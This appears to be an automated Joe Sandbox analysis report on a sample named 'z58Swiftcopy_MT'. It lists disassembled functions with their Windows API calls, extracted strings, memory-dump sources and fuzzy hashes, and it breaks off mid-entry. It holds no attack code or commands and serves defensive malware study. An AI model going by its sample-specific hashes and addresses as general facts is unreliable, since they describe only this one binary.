                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                                      • String ID: PD$PD
                                                                                                                                                                                                                                      • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                                      • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                                      Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2163313125-0
                                                                                                                                                                                                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                                      Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$wcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3592753638-3916222277
                                                                                                                                                                                                                                      • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                                      Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                                      • String ID: %s (%s)$YV@
                                                                                                                                                                                                                                      • API String ID: 3979103747-598926743
                                                                                                                                                                                                                                      • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                                      Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                                      • API String ID: 2780580303-317687271
                                                                                                                                                                                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                                                      Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                                      • API String ID: 2767993716-572158859
                                                                                                                                                                                                                                      • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                                                                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                                                      Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                                      • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                                      • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                                                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                                                      Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                                      • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                                      • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                                      • Opcode ID: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                                                                                                                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                                                      Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                                      • String ID: ($d
                                                                                                                                                                                                                                      • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                                      • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                                                                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                                                      Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3015003838-0
                                                                                                                                                                                                                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                                                      Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 59245283-0
                                                                                                                                                                                                                                      • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                                      Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004185AC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2802642348-0
                                                                                                                                                                                                                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
